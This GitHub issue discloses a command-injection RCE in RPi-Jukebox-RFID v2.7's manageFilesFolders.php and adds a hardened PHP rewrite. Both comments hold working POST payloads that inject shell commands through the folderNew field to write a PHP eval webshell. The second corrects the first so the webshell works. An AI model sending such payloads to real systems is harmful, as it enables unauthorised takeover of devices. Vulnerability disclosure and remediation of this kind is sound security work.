MiczFlor / RPi-Jukebox-RFID

A Raspberry Pi jukebox, playing local music, podcasts, web radio and streams triggered by RFID cards, web app or home automation. All plug and play via USB. GPIO scripts available.
http://phoniebox.de
MIT License

šŸ› | RPi-Jukebox-RFID V2.7_RCE_3 #2398

Open xjzzzxx opened 1 month ago

xjzzzxx commented 1 month ago

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\manageFilesFolders.php

if(                                         // Line 90(Check point)
    isset($post['folder'])
    && $post['folder'] != ""
    && file_exists($post['folder'])
    && is_dir($post['folder'])
) {
    $moveFolder = $post['folder'];          // Line 97(Source)
} else {
    $moveFolder = $Audio_Folders_Path;
}
if (
    isset($post['folderNew'])
    && $post['folderNew'] != ""
) {
    $moveFolder = $moveFolder . "/" . $post['folderNew'];   //Line 110(Source)
    if(!file_exists($Audio_Folders_Path . "/" . $moveFolder)) {
        $exec = 'mkdir "' . $moveFolder . '"; chown -R pi:www-data "' . $moveFolder . '"; sudo chmod -R 777 "' . $moveFolder . '"';
        exec($exec);    // Line 115(Sink)
    }
}

Sources: Line 97 ($_POST['folder']) and Line 110 ($post['folderNew']).

Then there is a check point (Line 90), which we bypass by setting $_POST['folder'] = 2.

After bypassing the check point, the tainted source is passed to $exec and exec($exec); (Line 115) without any further check.

PoC

POST /htdocs/manageFilesFolders.php

Data:

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is the version without url encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell3.php ; echo "hello

Manual verification

(screenshots 5 and 6 of the manual verification are not reproduced here)

The attacker can then easily connect to this webshell (/htdocs/shell3.php).

Logs

No response

Configuration

No response

More info

No response
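For comparison, the following is an added example of how the folder-creation step quoted above can be written without passing user input through a shell. It is not code from the project or from the reporter; the function name createAudioSubfolder, the temporary directory used as the audio root and the 0775 mode are assumptions made for illustration.

```php
<?php
// Added example (not project code): a hardened replacement for the
// folder-creation step quoted in the issue. Function names and the
// temporary audio root used below are assumptions for illustration.

/**
 * Create a new sub-folder below the audio root without invoking a shell.
 * Returns the directory path, or throws on any invalid input.
 */
function createAudioSubfolder(string $audioRoot, ?string $folder, string $folderNew): string
{
    $root = realpath($audioRoot);
    if ($root === false || !is_dir($root)) {
        throw new RuntimeException('audio root does not exist');
    }

    // Parent: default to the root; if given, it must resolve to a directory
    // inside the root (realpath() canonicalises "..", symlinks and "./2").
    $parent = $root;
    if ($folder !== null && $folder !== '') {
        $resolved = realpath($folder);
        if ($resolved === false || !is_dir($resolved)
            || strpos($resolved . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) !== 0) {
            throw new InvalidArgumentException('folder is not inside the audio root');
        }
        $parent = $resolved;
    }

    // New name: exactly one path component from a conservative allow-list.
    // Quotes, ';', '>', '$', '/' and the like are rejected outright.
    if (!preg_match('/^[A-Za-z0-9 _.-]{1,100}$/', $folderNew)
        || $folderNew === '.' || $folderNew === '..') {
        throw new InvalidArgumentException('invalid folder name');
    }

    $target = $parent . DIRECTORY_SEPARATOR . $folderNew;
    if (file_exists($target)) {
        return $target; // already present, nothing to do
    }

    // Native mkdir() instead of exec(): no shell, so no command injection.
    // 0775 instead of 777; the web server user owns what it creates.
    if (!mkdir($target, 0775)) {
        throw new RuntimeException('mkdir failed');
    }
    return $target;
}

// Demonstration with a throwaway directory standing in for $Audio_Folders_Path.
$tmpRoot = sys_get_temp_dir() . '/audiofolders_' . bin2hex(random_bytes(4));
mkdir($tmpRoot, 0775);

// A legitimate request creates the folder.
echo createAudioSubfolder($tmpRoot, '', 'new album'), PHP_EOL;

// The folderNew value from the report is refused before the filesystem is touched.
try {
    createAudioSubfolder($tmpRoot, '2', 'hello" ; echo "x" > ./shell3.php ; echo "hello');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The two changes that matter are the containment check on the parent folder (a bare file_exists()/is_dir() test accepts any existing path, including relative ones) and the removal of exec() entirely. If a shell call had to stay for the chown step, every interpolated value would at minimum need to go through escapeshellarg(), but avoiding the shell removes the class of bug rather than one instance of it.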

xjzzzxx commented 1 month ago

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

PoC (fixed)

POST /htdocs/manageFilesFolders.php

Data

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell3%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is the data without URL encoding, for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval(\$_POST['shell3']) ?>" > ./shell3.php ; echo "hello

Manual verification

(screenshots 15 and 16 of the manual verification are not reproduced here)